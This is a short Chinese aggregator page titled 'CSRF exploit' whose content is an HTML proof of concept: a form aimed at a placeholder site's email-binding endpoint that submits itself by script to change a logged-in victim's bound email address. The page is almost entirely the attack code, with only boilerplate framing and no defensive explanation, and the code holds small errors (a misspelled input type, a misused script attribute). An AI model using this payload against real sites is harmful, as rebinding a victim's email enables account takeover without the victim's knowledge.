csrf利用EXP
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csrf利用EXP相关的知识,希望对你有一定的参考价值。
<html>
<body>
<form action="http://www.xxx.com/user/setting/email_bind.html" method="post">
<input type="hiden" name="new_email" value="[email protected]" />
</form>
<script language="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
以上是关于csrf利用EXP的主要内容,如果未能解决你的问题,请参考以下文章